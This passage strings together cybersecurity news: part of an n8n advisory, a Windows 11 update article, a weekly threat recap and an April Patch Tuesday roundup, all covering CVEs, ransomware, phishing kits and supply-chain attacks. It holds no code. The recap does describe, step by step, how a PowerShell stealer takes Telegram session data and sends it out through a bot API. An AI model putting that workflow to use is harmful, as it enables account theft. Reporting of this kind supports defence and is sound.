Request node, leading to remote code execution on the n8n host. (Fixed in n8n versions 1.123.43, 2.20.7, and 2.22.1) CVE-2026-44790 (CVSS score: 9.4) - An authenticated user with permission to create or modify workflows could inject CLI flags on the Git node's Push operation, enabling an attacker to read arbitrary files from the n8n server and resulting in full compromise. (Fixed in n8n versions 1.123.43, 2.20.7, and 2.22.1) Software Patches from Other Vendors Security updates have also been released by other vendors over the past several weeks to rectify various vulnerabilities, including - ABB Adobe Amazon Web Services AMD Apple ASUS Atlassian Axis Communications AVEVA Canon Cisco CODESYS ConnectWise Dell Devolutions Drupal F5 Fortra Foxit Software Fujitsu GitLab GnuTLS Google Android and Pixel Google Chrome Google Cloud Grafana Hikvision Hitachi Energy Honeywell HP HP Enterprise (including Aruba Networking and Juniper Networks) Huawei IBM Intel Jenkins Lenovo Linux distributions AlmaLinux, Alpine Linux, Amazon Linux, Arch Linux, Debian, Gentoo, Oracle Linux, Mageia, Red Hat, Rocky Linux, SUSE, and Ubuntu MediaTek Meta WhatsApp Microsoft Mitel Mitsubishi Electric MongoDB Moxa Mozilla Firefox, Firefox ESR, and Thunderbird NVIDIA OPPO Palo Alto Networks Phoenix Contact Phoenix Technologies Progress Software QNAP Qualcomm React Ricoh Samsung Schneider Electric Siemens Sophos Spring Framework Supermicro Synology Tenable TP-Link WatchGuard Zoom, and Zyxel
thehackernews.comMay 18, 2026extracted
Windows 11 KB5089549 & KB5087420 cumulative updates released
Microsoft has released Windows 11 KB5089549 and KB5087420 cumulative updates for versions 25H2/24H2 and 23H2 to fix security vulnerabilities, bugs, and add new features. Today's updates are mandatory as they contain the May 2026 Patch Tuesday security patches for 120 vulnerabilities discovered in previous months. You can install today's update by going to Start > Settings > Windows Update and clicking on 'Check for Updates.' You can also manually download and install the update from the Microsoft Update Catalog. This is the fifth 'Patch Tuesday' release in 2026, and it's based on 24H2, which means 25H2 gets the same update. There are no exclusive or special changes. You'll get the same fixes across the two versions of Windows 11. What's new in the May 2026 Patch Tuesday update After installing today's security updates, Windows 11 25H2 (KB5089549) will have its build number changed to 26200.8457 25H2 and 26100.8457 (24H2), and 23H2 (KB5087420) will be changed to 22631.7079. After the update, Xbox mode is added to the desktop, and it allows you to experience an Xbox console-like experience on your PC. In addition, Microsoft has patched issues with the taskbar and improved the reliability of Windows Hello. Here's the full list of improvements and fixes: [File Explorer] - New! This update expands the list of archive formats that can be used in File Explorer to include uu, cpio, xar, and NuGet Packages (nupkg). - With this update, View and Sort preferences are preserved in folders such as Downloads and Documents when apps launch File Explorer directly to those locations. - This update removes a white flash that could appear when opening This PC or while resizing the Details pane in dark mode. - This update improves the reliability of relevant explorer.exe processes so they stop after closing File Explorer windows. [Input] - New! You can feel haptic feedback effects on compatible input devices when performing certain actions, such as aligning objects in PowerPoint, snapping or resizing windows. These haptic signals can be turned on or off in Settings > Bluetooth & devices > Mouse, Touchpad, or Pen > Haptic signals. This experience is supported on Surface Slim Pen 2, ASUS Pen 3.0, and MSI Pen 2 with haptic feedback. Support for additional compatible devices, including select mice such as Logitech MX Master 4, might become available as hardware partners release updates. - New! Voice typing on the touch keyboard now looks simpler and more intuitive. The updated design removes the full‑screen overlay and shows voice typing animations directly on the dictation key, helping you stay focused without extra visual distractions. - New! The Arabic 101 Legacy keyboard layout is now available. You can add it when selecting a keyboard for Arabic under Time & Language > Language & Region. This option is for those who prefer the keyboard design used before recent changes with AltGr. - This update improves the reliability of setting custom tools under Settings > Bluetooth & Devices > Wheel. - This update improves the persistence of Fluid Dictation setting in voice typing. - This update improves the reliability of keyboard navigation for emoji panels (Windows logo key + Period). - This update improves the reliability of typing when using the ADLaM keyboard. [Sharing] New! Drag Tray is now called Drop Tray. Its settings are now under Settings > System > Multitasking (previously Nearby sharing). Drop Tray uses a smaller peek view. This improvement helps prevent the Drop Tray from opening unintentionally and makes it easier to dismiss when you work near the top of the screen. [Printing] New! This update adds a new icon to show where a printer supports Windows Protected Print Mode in print settings. [Enhanced security and performance for batch files] New! Administrators and Application Control for Business policy authors now have additional control over how the system processes batch files and Command Prompt (CMD) scripts. Starting with this release, administrators can enable a more secure processing mode for batch files. This mode prevents batch files from changing during execution. To enable this setting, add the following value to the registry:Registry Key: HKEY_LOCAL_MACHINE\Software\Microsoft\Command ProcessorValue name: LockBatchFilesWhenInUseType: DWORDData to be set: 0 (disabled) or 1 (enabled) Policy authors can also enable this mode by using the LockBatchFilesWhenInUse application manifest control, as documented in the Application Control for Business manifest schema. [Microsoft Store] This update reduces unexpected errors when downloading and installing apps from the Microsoft Store, including errors 0x80070057, 0x80240008, and 0x80073d28. [Fonts] This update includes improvements to the Leelawadee UI font family for the Thai, Lao, Khmer, and Lontara scripts to enhance glyph sequencing, positioning, and rendering. [Audio] This update improves third-party driver compatibility with midisrv.exe. [Taskbar] This update improves the reliability of loading the system tray area of the taskbar. [Windows Hello] This update improves: - Reliability of Windows Hello Face. - Persistence of Windows Hello Fingerprint across upgrades. [Storage] This update improves: - Performance when viewing storage information for large volumes in Settings > System > Storage > Advanced Storage Settings > Disks & Volumes. - The size limit for formatting FAT32 volumes from the command line from 32GB to 2TB. [Delivery Optimization] This update improves memory usage, reducing likelihood it will use an unexpectedly large amount of memory. [Display and graphics] This update improves persistence and availability of color profile options for supported monitors. [Kiosk mode] This update simplifies configuration for allowed packaged apps in kiosks when Microsoft Edge is one of the allowed apps. [General Performance] This update improves the performance of launching startup apps after starting your device (apps listed under Settings > Apps > Startup). [General Reliability] This update brings underlying changes to help improve explorer.exe reliability, including at sign‑in, when interacting with taskbar menus and Task View, when unpinning items from File Explorer’s Quick Access, and more. Microsoft is not aware of any new issues with this month's Patch Tuesday, and it's largely because it's not a massive release as compared to previous patch releases. At the same time, it's possible that the update does not have known issues because Microsoft has committed to a stable and reliable Windows experience. Microsoft has confirmed it's working on a big Windows 11 2026 quality update that restores the movable taskbar and will significantly improve the performance of modern interfaces, including the right-click menu. Microsoft also has plans to limit Copilot integration in Windows 11, reduce ads, and make the out-of-the-box experience faster with skippable Windows Updates. Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comMay 12, 2026extracted
⚡ Weekly Recap: AI-Powered Phishing, Android Spying Tool, Linux Exploit, GitHub RCE & More
This week, the shadows moved faster than the patches. While most teams were still triaging last month’s alerts, attackers had already turned control panels into kill switches, kernels into open doors, and open-source pipelines into silent delivery systems. The game has shifted from breach to occupation. They’re living inside SaaS sessions, pushing code with trusted commits, and scaling operations like legitimate businesses — except their product is chaos. And the underground is getting uncomfortably professional. Here’s the full weekly cybersecurity recap: ⚡ Threat of the Week cPanel Flaw Comes Under Attack—A critical flaw in cPanel and WebHost Manager (WHM) has come under active exploitation in the wild. The vulnerability, tracked as CVE-2026-41940, could result in an authentication bypass and allow remote attackers to gain elevated control of the control panel. In some cases, the attacks have led to a complete wipe of entire websites and backups. Other attacks have deployed Mirai botnet variants and a ransomware strain called Sorry. Is Your Security Program Built on Compliance Theater or Measurable Maturity? If you can't measure your program's maturity, you can't improve it or defend its budget. The SANS Security Awareness & Culture Maturity Model™️ maps 5 stages of security culture development with concrete indicators, behavioral targets, and alignment to business risk priorities. Download Now — Free ➝ 🔔 Top News Cybercrime Groups Use Vishing for Data Theft and Extortion—Two cybercrime groups tracked as Cordial Spider and Snarky Spider are carrying out "rapid, high-impact attacks" operating almost within the confines of SaaS environments, while leaving minimal traces of their actions. The groups employ voice calls, text messages, and emails, directing targeted employees to phishing pages masquerading as their employer's legitimate single sign-on (SSO) page to capture credentials and provide attackers an entry point into systems, which they exploit for deeper access to victims' SaaS environments. The attacks also use the initial access hooks to remove and set up multi-factor authentication devices under their control and delete emails that would otherwise alert organizations of potential malicious activity. According to CrowdStrike, "These actors use vishing to bypass MFA and move laterally across entire SaaS ecosystems with a single authenticated session, masking their tracks through residential proxy networks to blend in as legitimate home user traffic. This is part of a larger trend of English-speaking ransomware crews that share similar playbooks but are branching off into their own distinct groups." Copy Fail Linux Flaw Exploited—The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2026-31431, a vulnerability impacting various Linux distributions, to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. It's described as a logic bug in the Linux kernel's authentication cryptographic template that allows an attacker to reliably trigger privilege escalation trivially by means of a 732-byte Python-based exploit. According to Theori and Xint, CVE-2026-31431 was the result of a series of unremarkable updates to the Linux kernel over the years, particularly one update from 2017 that was meant to speed up data encryption. As a result, all major Linux distributions from 2017 are impacted. What complicates matters is that Copy Fail works 100% of the time, unlike most local privilege escalation (LPE) bugs that tend to be probabilistic in nature. More worryingly, it leaves no traces on disk as exploitation occurs in memory and enables container escape from any pod in a Kubernetes cluster. TeamPCP's Supply Chain Attack Spree Continues—TeamPCP's extensive supply chain campaign continued last week, as the cybercriminal group compromised several packages across the npm, PyPI, and Packagist ecosystems in a "Mini Shai-Hulud" attack. TeamPCP has in recent months compromised the packages of several open source software projects, including Trivy, a security scanner maintained by Aqua Security, and KICS, a Checkmarx-developed tool for static code analysis. Amit Genkin, threat researcher at Upwind, said the latest string of attacks represents a shift, where they are not only more frequent but harder to detect because they weaponize legitimate CI/CD pipelines to push out poisoned versions under real identities, allowing the activity to blend in with normal development workflows. "Campaigns like Shai-Hulud take that further by using each compromised pipeline to spread to the next, turning credential theft into a scaling problem across environments," Genkin said. "For teams, the immediate priority is to check for the affected version and rotate any credentials tied to pipelines that may have run it, especially GitHub and cloud tokens. Longer term, this is a signal to reduce how broadly pipeline credentials are scoped and to add visibility into what's actually happening during installs and builds – because if you're relying on traditional scanning or known indicators, this type of activity is easy to miss." New Python Backdoor Enables Comprehensive Data Theft—A newly identified stealthy Python-based backdoor framework dubbed DEEP#DOOR provides attackers with persistent remote command execution and surveillance capabilities on Windows computers. Once active, the backdoor enables shell command execution, file manipulation, system and network reconnaissance, and surveillance operations such as keylogging, clipboard monitoring, screenshot capture, microphone and webcam access, and credentials and SSH key harvesting. Additionally, the malware can shift from data gathering to disruption and system manipulation, as it can overwrite the Master Boot Record, force system crashes, exhaust system resources by spawning numerous processes, and disable Microsoft Defender services. GitHub Flaw Leads to Remote Code Execution—Cybersecurity researchers from Wiz disclosed details of a critical security vulnerability impacting GitHub.com and GitHub Enterprise Server (CVE-2026-3854, CVSS score: 8.7) that could allow an authenticated user to obtain remote code execution with a single "git push" command. The vulnerability was severe enough that Microsoft rolled out a patch within six days of responsible disclosure. On GitHub.com, it allowed remote code execution on shared storage nodes, and on GitHub Enterprise Server, it granted full server compromise, enabling unauthorized access to all hosted repositories and internal secrets. "Exploitation could expose the codebases of nearly all of the world's biggest enterprises, making this one of the most severe SaaS vulnerabilities ever found," a Wiz spokesperson told The Hacker News. VECT 2.0 Ransomware's Flawed Encryption Makes Data Recovery Impossible—VECT 2.0 ransomware has been found to wipe large files instead of merely encrypting them, making recovery impossible, even for the attackers. VECT 2.0 is a ransomware-as-a-service (RaaS) program that first appeared in December 2025. The group quickly grabbed headlines after it announced on BreachForums that it was partnering with TeamPCP, the threat group behind several supply chain attacks, such as Trivy, Checkmarx KICS, LiteLLM, and Telnyx, in March and April 2026. VECT also announced a partnership with BreachForums itself, promising that every registered forum user will become an affiliate and be granted use of the ransomware, negotiation platform, and leak site for operations. Beazley Security, in an analysis of the ransomware, said the VECT 2.0 RaaS panel covers the "full operational lifecycle an affiliate needs from payload generation through to payout." 🔥 Trending CVEs Bugs drop weekly, and the gap between a patch and an exploit is shrinking fast. These are the heavy hitters for the week: high-severity, widely used, or already being poked at in the wild. Check the list, patch what you have, and hit the ones marked urgent first — CVE-2026-41940 (cPanel and WebHost Manager), CVE-2026-31431 aka Copy Fail (Linux Kernel), CVE-2026-42208 (LiteLLM), CVE-2026-3854 (GitHub.com and GitHub Enterprise Server), CVE-2026-32202 (Microsoft Windows Shell), CVE-2026-26268 (Cursor), CVE-2026-35414 (OpenSSH), CVE-2026-6770 (Mozilla Firefox and Tor Browser), CVE-2026-42167 (ProFTPD), CVE-2026-24908, CVE-2026-23627, CVE-2026-24487 (OpenEMR), CVE-2026-6807 (GRASSMARLIN), CVE-2026-7363, CVE-2026-7361, CVE-2026-7344, CVE-2026-7343 (Google Chrome), CVE-2026-7322, CVE-2026-7323, CVE-2026-7324 (Mozilla Firefox), CVE-2026-6100 (CPython), CVE-2026-0204 (SonicWall), CVE-2026-35414 (OpenSSH), CVE-2026-42511 (FreeBSD), CVE-2026-40684, CVE-2026-40685, CVE-2026-40686, CVE-2026-40687 (Exim), CVE-2026-5402, CVE-2026-5403, CVE-2026-5405, CVE-2026-5656 (Wireshark), CVE-2026-42520, CVE-2026-42523, CVE-2026-42524 (Jenkins), CVE-2026-3008 (Notepad++), and CVE-2025-41658, CVE-2025-41659, CVE-2025-41660 (CODESYS). 🎥 Cybersecurity Webinars Learn to Spot Attack Paths Your AppSec Tools Completely Miss → Modern attackers chain tiny flaws across code, pipelines, and cloud into major breaches — while your AppSec tools stay blind. Join this free webinar with Wiz and The Hacker News to uncover the top real-world attack paths and learn exactly how to spot, map, and stop them fast. Practical insights to prioritize real risks and strengthen your entire software lifecycle. How to Match AI Attack Speed with Autonomous Exposure Validation → Struggling with AI attacks moving faster than your team can respond? Join this free webinar from Picus Security & The Hacker News to discover Autonomous Exposure Validation – how to automatically find real risks, test attack paths, and fix them in minutes, not weeks. Practical, no-fluff insights to stay ahead without burnout. Grab your spot now. Learn Latest AI Threats + Practical Ways to Kill Initial Access → Modern attackers are slipping past traditional defenses with AI-powered phishing, encrypted malware, and stealthy “Patient Zero” tactics. Want to stay ahead? Join this free webinar with Zscaler and The Hacker News to uncover the latest threat trends and practical Zero Trust strategies that actually stop initial compromise — before it becomes a full-blown breach. No fluff, just real insights to protect your organization. 📰 Around the Cyber World OpenAI Debuts Advanced Account Security —OpenAI launched Advanced Account Security, a set of opt-in protections for ChatGPT users "designed for people at increased risk of digital attacks, as well as for those who want the strongest account protections available." As part of the new program, the new controls strengthen sign-in protections, tighten account recovery, reduce exposure from compromised sessions, and give users more visibility into account activity. OpenAI has also partnered with Yubico to link two physical security keys, YubiKey C Nano and YubiKey C NFC, to ChatGPT accounts. That said, users can use any other FIDO-compliant security key, or use software-based passkeys for phishing-resistant authentication. Over 8.8K Ransomware Attacks in 2025 —Fortinet said it recorded 7,831 confirmed ransomware victims globally in 2025, skyrocketing from approximately 1,600 identified victims in 2024. "Availability of crime service kits like WormGPT, FraudGPT, and BruteForceAI contributed to this 389% increase year-over-year (YoY)," Fortinet said. "The top three targeted sectors include manufacturing (1,284), business services (824), and retail (682). Geographic concentration includes the U.S. (3,381), Canada (374), and Germany (291)." KidsProtect Android Surveillance Tool Marketed on the Web —A new Android surveillance tool called KidsProtect is being openly advertised on the clear web that gives an operator near-total secret control of a victim’s phone. "It can't be removed without the attacker's permission," Certo said. "From a web-based dashboard, an operator can secretly record calls, stream live audio from the device’s microphone, track GPS location in real time, read SMS messages and notifications from apps including WhatsApp and Viber, log keystrokes, access contacts and photos, and remotely trigger the front and rear cameras." Assessed to be the work of a Greek-speaking developer, it's available on a subscription basis starting from $60, allowing anyone to buy it, rebrand it, and start selling it as their own. New KYCShadow Android Malware Detected —An Android malware masquerading as a bank KYC verification application is being distributed via WhatsApp and primarily targeting users in India. "The application operates as a multi-stage dropper that installs a secondary payload and establishes persistent command-and-control (C2) communication," CYFIRMA said. "It combines native code obfuscation, Firebase-based remote execution, VPN-based traffic manipulation, and WebView-based phishing to systematically harvest sensitive user data." Phishing Campaign Targets Pakistan Orgs —A highly targeted spear-phishing campaign targeting the Punjab Safe Cities Authority and PPIC3 in Pakistan has been found to use legitimate-sounding government infrastructure projects as lures to deliver malware. "The email carried two malicious attachments: a Word document with a VBA macro dropper and a PDF with a fake Adobe Reader lure, both delivering payloads from a BunnyCDN-hosted malicious infrastructure," Joe Security said. "The attack chain establishes persistent remote access by abusing Microsoft's legitimate VS Code tunnel service, with exfiltration notifications sent via a Discord webhook — a sophisticated technique designed to evade network-level detection." Calendly-Themed Phishing Attacks on the Rise —Multiple threat clusters are leveraging Calendly-themed phishing to fingerprint site visitors and steal credentials and other data. "Behind the shared Calendly branding sits a diverse set of phishing kits, including API-driven frameworks, real-time Socket.IO applications, fake CAPTCHA chains, and Telegram-based exfiltration," urlscan said. Fraud Campaigns GovTrapand FEMITBOT Exposed —Threat actors have been observed deploying sophisticated tactics, including fake government portals, SMS phishing, and lookalike domains, to drive financial fraud and credential harvesting as part of an effort called GovTrap. The government impersonation scam mimics official portals with high accuracy, with links to the fake sites distributed via SMS or email. The end goal is to trick users into entering their personal and financial information, or make non-existent payments that are transferred through money mule accounts. The collected payment card details are abused to facilitate fraudulent transactions. Another threat cluster has leveraged FEMITBOT, a malicious infrastructure that abuses Telegram Mini Apps to scale global fraud campaigns and Android malware delivery. "By leveraging Telegram's native features, threat actors create highly convincing fake platforms across crypto, financial services, AI, and streaming sectors," CTM360 said. "Built on a modular, template-driven architecture, FEMITBOT enables rapid deployment, brand impersonation, and campaign optimization using real-time tracking and analytics." New PowerShell Desktop Stealer Spotted —A Pastebin-hosted PowerShell script disguised as "Windows Telemetry Update" comes with capabilities to steal Telegram Desktop session data via Telegram bot API exfiltration. "The script collects host metadata, including username, hostname, and public IP via api.ipify[.]org, then checks for Telegram Desktop and Telegram Desktop Beta tdata directories," Flare said. "If found, it terminates the Telegram process to release file locks, archives session material into 'TEMP\diag.zip,' and uploads the archive to the attacker-controlled operator chat via the Telegram Bot API sendDocument endpoint." Surge in Teams Phishing in 2026 —eSentire said it has observed an increase in Microsoft Teams-based phishing since early 2026, in which threat actors impersonate IT support and help desk personnel to trick users into granting remote access to their devices. "These phishing attacks have often been linked to email bombing, followed by threat actors reaching out to users under the guise of providing assistance to resolve an issue," eSentire said. "The objective of the attack is to trick the user into granting remote access to their device, and once obtained, threat actors will attempt to exfiltrate data and execute additional payloads to establish persistence or deploy ransomware." New KarstoRAT Malware Enables Data Theft —First spotted in early 2026, KarstoRAT is capable of system reconnaissance, audio and webcam monitoring, screenshot capture, key logging, and token theft. It also enables threat actors to download and run additional payloads, which could point to it being used for post-compromise control on infected machines. "KarstoRAT uses a command-and-control (C2) server that has a diverse set of open ports and services, indicating that it has a multi-purpose infrastructure created for C2 communication and payload distribution," LevelBlue said. "Threat actors use a fake Blox Fruits (a popular Roblox game) virtual marketplace as a lure to trick players into downloading malware that will install KarstoRAT into their machines." ClickUp Discloses Email Address Exposure —ClickUp said its client-side feature flag configuration exposed personally identifiable information. This included 893 customer email addresses that were embedded in feature flag targeting rules, along with one flag that improperly referenced a customer’s API token. "The exposure was limited to 893 customer email addresses used in feature flag targeting rules to control which users see specific features during rollouts," it said. "If your email address was among those included in a feature flag configuration, you have been directly contacted." The incident did not expose any other data. Finnish Authorities Arrest Alleged Scattered Spider Member —Finnish authorities arrested 19-year-old Peter Stokes (aka Bouquet), a dual U.S.-Estonian citizen, as he tried to board a flight to Japan. U.S. prosecutors have charged him as a key member of the notorious Scattered Spider hacking group, and he faces multiple counts of wire fraud, conspiracy, and computer intrusion. New Attacks Linked to Versatile Werewolf —The threat actor known as Versatile Werewolf (aka HeartlessSoul) has been linked to campaigns targeting Russian state structures and aviation companies via phishing emails with malicious archive attachments and malvertising campaigns to deliver a JavaScript trojan. The end goal is to obtain confidential data, particularly geospatial information. Alternatively, the threat actor is known to distribute malicious code using the legitimate SourceForge platform through a project called GearUP. Versatile Werewolf is believed to be active since at least September 2025. Some of the attachments have exploded ZDI-CAN-25373 to trigger the infection chain. The malvertising campaign uses fake domains ("battleflight[.]pro") to deliver bogus installers for aviation-related software to launch the same trojan. "The initial infection involves executing PowerShell commands or scripts designed to download a JavaScript loader from C2 servers," Kaspersky said. "This loader, in turn, loads and executes the main JS-RAT and its modules in memory, among which we found tools for data collection and exfiltration, keyloggers, screen capture tools, UAC bypass tools, and other payloads." The company noted that the domain "battleflight[.]pro" resolves to an IP address that also hosts fake domains linked to the GOFFEE APT. "Both groups actively use PowerShell payloads to deliver and execute malicious modules," it added. "GOFFEE also targets the public sector, which suggests the possibility of joint or coordinated campaigns." Cisco Unveils Model Provenance Kit —Cisco unveiled a new open-source tool, named Model Provenance Kit, to help organizations address potential issues associated with the use of third-party AI models. "Much like a DNA test reveals biological origins, the Model Provenance Kit examines both metadata and the actual learned parameters of a model (like a unique genome that comprises a model), to assess whether models share a common origin and identify signs of modification," Cisco said. "This, combined with a constitution that defines provenance linkages, is an important step toward providing evidence-based assurance that the AI you deploy is what it says it is." Abuse of Hugging Face and ClawHub for Malware Delivery —Threat actors are abusing legitimate AI platforms like Hugging Face and ClawHub for malware delivery, once again demonstrating how trust in AI ecosystems are being exploited. Acronis said it identified more than 575 malicious skills across 13 developer accounts that target both Windows and macOS systems with trojans, cryptocurrency miners, and AMOS stealer, a macOS-focused infostealer. "On Hugging Face, attackers leverage repositories to host payloads and act as staging infrastructure within multistep infection chains, distributing malware disguised as legitimate applications," Acronis said. European Authorities Bust Cryptocurrency Fraud Ring —Albanian and Austrian authorities dismantled a cryptocurrency investment fraud ring that caused estimated losses of more than €50 million ($58.5 million) to victims worldwide. The operation, which took place over two years, resulted in the arrest of ten individuals, the search of multiple premises, and the seizure of 891,735 in cash, 443 computers, 238 mobile phones, six laptops, and multiple storage devices. "The criminal network, allegedly operating several call centres in Tirana, Albania, is believed to have caused significant financial damage, totalling at least €50 million," Europol said. "The call centres were professionally set up and organized, resembling legitimate business structures featuring a clear division of roles and hierarchical management." The criminal network is estimated to have involved up to 450 employees across various departments. The scheme involved luring victims to seemingly legitimate online investment platforms through deceptive advertisements on social media or web searches, and coaxing them into making investments under the promise of huge returns. Victims were then assigned retention agents, who masqueraded as investment advisors and used remote access software to gain full control of their devices. "The fraudsters feigned professional expertise and employed psychological pressure to persuade victims to make additional investments, falsely claiming they would be profitable," Europol said. "In truth, the funds were never invested but were instead channelled into an intricate international money-laundering scheme, ultimately disappearing into the hands of the criminal organisation." In some cases, the fraudsters reached out to the victims again and offered help with recovering their stolen funds, only to demand a €500 entry fee and defraud them a second time. Flaws in EnOcean's SmartServer —Two security flaws have been disclosed in EnOcean's SmartServer IoT platform that affect version 4.60.009 and prior. According to Claroty: "CVE-2026-20761 allows remote attackers to send malicious, crafted LON IP-852 messages that result in arbitrary command execution on devices. CVE-2026-22885 allows remote attackers to send malicious, crafted IP-852 messages that bypass ASLR memory protections and leak memory." Successful exploitation of the flaws results in attackers obtaining control over building management and building automation systems running affected versions of this platform and legacy i.LON devices. Patches have been released for both vulnerabilities. Google Announces Android Credential Manager Update —Google has announced a new update to Android's Credential Manager that allows apps to automatically verify a user's personal Gmail address without requiring one-time passwords (OTPs) or email verification links. "Google now issues a cryptographically verified email credential directly to Android devices," the company said. "For users, this completely removes the need to manually verify their email through external channels. For developers, the API securely delivers these verified user claims for any scenario, whether you are building an account creation flow, a recovery process, or a high-risk step-up authentication." Nearly 8.8K Secrets Leaked Online —According to Truffle Security, 8,792 verified, unique secrets have been leaked online through web-based development environments. The tokens were found across 22 million public projects hosted on Cloud Development Environments (CDEs) such as CodePen, CodeSandbox, JSFiddle, and StackBlitz. Is There More to the Xygeni Compromise? —Multiple connections have been found between the compromise of the Xygeni vulnerability scanner on GitHub and a proxy botnet of hacked ASUS and TP-Link routers. Some of the TP-Link consumer routers have been compromised with Microsocks to unroll them to a residential proxy network. "These routers were also running a custom command-and-control beacon that was named ShadowLink," Ctrl-Alt-Intel said. "When we analysed the ShadowLink protocol, we found it was identical, down to a shared authentication secret, to the backdoor planted in the Xygeni GitHub Action used for that supply chain attack." Brazilian Anti-DDoS Firm Behind DDoS Attacks on ISPs —Huge Networks, a Brazilian tech company that specializes in protecting networks from distributed denial-of-service (DDoS) attacks, has been enabling a botnet responsible for massive DDoS attacks against other internet service providers (ISPs) in the country, according to KrebsOnSecurity. The company has since said the malicious activity resulted from an intrusion first detected in January 2026 and claimed it was likely the work of a competitor. Canonical Target of Sustained DDoS Attack —Canonical disclosed its web infrastructure came under a "sustained, cross-border attack," knocking Ubuntu servers offline for several hours. A pro-Iranian hacktivist group known as the Islamic Cyber Resistance in Iraq, aka 313 Team, claimed responsibility for the attack on Telegram. The websites have since become operational. Last month, the group also disrupted access to the decentralized social media platform Bluesky. New Phishing Kit Bluekit Detailed —A new phishing kit named Bluekit is offering more than 40 templates targeting popular services and includes basic artificial intelligence (AI)-powered features for generating campaign drafts. Available templates can be used to target email accounts (Outlook, Hotmail, Gmail, Yahoo, ProtonMail), cloud and enterprise services (iCloud and Zoho), developer platforms (GitHub), and cryptocurrency services (Ledger). What makes the kit stand out is the presence of an AI Assistant panel that supports multiple models, including Llama, GPT-4.1, Claude, Gemini, and DeepSeek, to help criminals draft phishing emails. It also has support for two-factor authentication, geolocation emulation, antibot cloaking, notifications, spoofing capabilities, voice cloning, and a mail sender. The development once again reinforces the broader trend of crimeware services integrating AI to streamline and scale their operations. Bluekit is the second kit to integrate AI features in as many months. In April 2026, Abnormal Security shed light on a cybercrime platform called ATHR that uses AI vishing agents, credential harvesting panels, and built-in phishing mailers to execute and scale telephone-oriented attack delivery (TOAD) attacks. North Korea Calls U.S. Cyber Threat Claims a Fabrication — North Korea's foreign ministry rejected U.S. accusations that the country poses a cyber threat, stating the U.S. was spreading false information about a non-existent cyber threat from North Korea for political purposes, per Reuters. The ministry said it "would actively take all necessary measures for defending the interests of the state and protecting the rights and interests of its citizens in cyberspace." 🔧 Cybersecurity Tools Model Provenance Kit → It is a free open-source Python tool from Cisco AI Defense that helps identify if a machine learning model is based on a known base model (like Llama, Mistral, GPT, etc.). It analyzes architecture, tokenizer, and weights to quickly compare two models or check against a database of ~150 popular base models. AutoFyn → It is an open-source tool from SignalPilot Labs that runs Claude AI in self-improving loops to optimize measurable goals. Give it a GitHub repo, a clear task (like security hardening, bug fixing, or performance optimization), and a time budget — it works in sandboxed rounds, tracks progress with real evaluations, learns from failures, and delivers improved code via PRs. Disclaimer: This is strictly for research and learning. It hasn't been through a formal security audit, so don't just blindly drop it into production. Read the code, break it in a sandbox first, and make sure whatever you’re doing stays on the right side of the law. Conclusion Stay sharp out there. The pace of attacks is accelerating, and the margin for delay is shrinking. Patch what you can today, verify your supply chains, tighten SaaS access, and treat every “routine” login or pipeline run as potentially hostile. Small habits now will save major headaches later. Until next Monday. Keep your defenses tight and your eyes open. The threats won’t wait — neither should we. See you in the next recap.
thehackernews.comMay 4, 2026extracted
April Patch Tuesday Fixes Critical Flaws Across SAP, Adobe, Microsoft, Fortinet, and More
A number of critical vulnerabilities impacting products from Adobe, Fortinet, Microsoft, and SAP have taken center stage in April's Patch Tuesday releases. Topping the list is an SQL injection vulnerability impacting SAP Business Planning and Consolidation and SAP Business Warehouse (CVE-2026-27681, CVSS score: 9.9) that could result in the execution of arbitrary database commands. "The vulnerable ABAP program allows a low-privileged user to upload a file with arbitrary SQL statements that will then be executed," Onapsis said in an advisory. In a potential attack scenario, a bad actor could abuse the affected upload-related functionality to run malicious SQL against BW/BPC data stores, extract sensitive data, and delete or corrupt database content. "Manipulated planning figures, broken reports, or deleted consolidation data can undermine close processes, executive reporting, and operational planning," Pathlock said. "In the wrong hands, this issue also creates a credible path to both stealthy data theft and overt business disruption." Another security vulnerability that deserves a mention is a critical-severity remote code execution in Adobe Acrobat Reader (CVE-2026-34621, CVSS score: 8.6) that has come under active exploitation in the wild. That said, there are many unknowns at this stage. It is not clear how many people have been affected by the hacking campaign. Nor is there any information about who is behind the activity, who is being targeted, and what their motives could be. Also patched by Adobe are five critical flaws in ColdFusion versions 2025 and 2023 that, if successfully exploited, could lead to arbitrary code execution, application denial-of-service, arbitrary file system read, and security feature bypass. The vulnerabilities are listed below - CVE-2026-34619 (CVSS score: 7.7) - A path traversal vulnerability leading to security feature bypass CVE-2026-27304 (CVSS score: 9.3) - An improper input validation vulnerability leading to arbitrary code execution CVE-2026-27305 (CVSS score: 8.6) - A path traversal vulnerability leading to arbitrary file system read CVE-2026-27282 (CVSS score: 7.5) - An improper input validation vulnerability leading to security feature bypass CVE-2026-27306 (CVSS score: 8.4) - An improper input validation vulnerability leading to arbitrary code execution Fixes have also been released for two critical FortiSandbox vulnerabilities that could result in authentication bypass and code execution - CVE-2026-39813 (CVSS score: 9.1) - A path traversal vulnerability in FortiSandbox JRPC API that could allow an unauthenticated attacker to bypass authentication via specially crafted HTTP requests. (Fixed in versions 4.4.9 and 5.0.6) CVE-2026-39808 (CVSS score: 9.1) - An operating system command injection vulnerability in FortiSandbox that could allow an unauthenticated attacker to execute unauthorized code or commands via crafted HTTP requests. (Fixed in version 4.4.9) The development comes as Microsoft addressed a staggering 169 security defects, including a spoofing vulnerability impacting Microsoft SharePoint Server (CVE-2026-32201, CVSS score: 6.5) that could allow an attacker to view sensitive information. The company said it's being actively exploited, although there are no insights into the in-the-wild exploitation associated with the bug. "SharePoint services, especially those used as internal document stores, can be a treasure trove for threat actors looking to steal data, especially data that may be leveraged to force ransom payments using double extortion techniques by threatening to release the stolen data if payment is not made," Kev Breen, senior director of threat research at Immersive, said. "A secondary concern is that threat actors with access to SharePoint services could deploy weaponised documents or replace legitimate documents with infected versions that would allow them to spread to other hosts or victims moving laterally across the organization." Software Patches from Other Vendors In addition to Microsoft, security updates have also been released by other vendors over the past several weeks to rectify several vulnerabilities, including — ABB Amazon Web Services AMD Apple ASUS AVEVA Broadcom (including VMware) Canon Cisco Citrix CODESYS D-Link Dassault Systèmes Dell Devolutions dormakaba Drupal Elastic F5 Fortinet Foxit Software FUJIFILM Gigabyte GitLab Google Android and Pixel Google Chrome Google Cloud Grafana Hitachi Energy HP HP Enterprise (including Aruba Networking and Juniper Networks) Huawei IBM 